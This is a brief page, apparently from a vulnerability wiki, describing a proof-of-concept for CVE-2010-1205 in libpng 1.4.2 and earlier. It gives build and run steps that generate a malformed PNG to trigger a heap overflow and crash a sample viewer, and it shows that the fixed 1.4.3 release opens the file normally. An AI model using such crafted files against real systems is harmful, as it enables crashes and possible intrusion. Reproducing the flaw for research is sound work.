PWNWIK.COM
,
INFO
Sample exploit using CVE-2010-1205 vulnerability in libpng (<=1.4.2) gregbook - set of sample programs distributed with libpng sources generate - generates malicious png file which triggers heap-overflow while reading the file with libpng steps to reproduce: ./build.sh # build all libraries and executables. gregbook/rpng2-x is linked against libpng-1.4.2 (buggy) ./generate/build/generate # generates xploit.png - malformed png file cd gregbook/ ./rpng2-x ../xploit.png # run explaple which shows how to use libpng to display png file. Ends with Segmentation fault. steps to run with fixed libpng version (1.4.3): in gregbook/Makefile edit line 33: PNGDIR = ../libpng-1.4.3 in gregbook directory run: make clean && make ./rpng2-x ../xploit.png # opens window with the png file
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
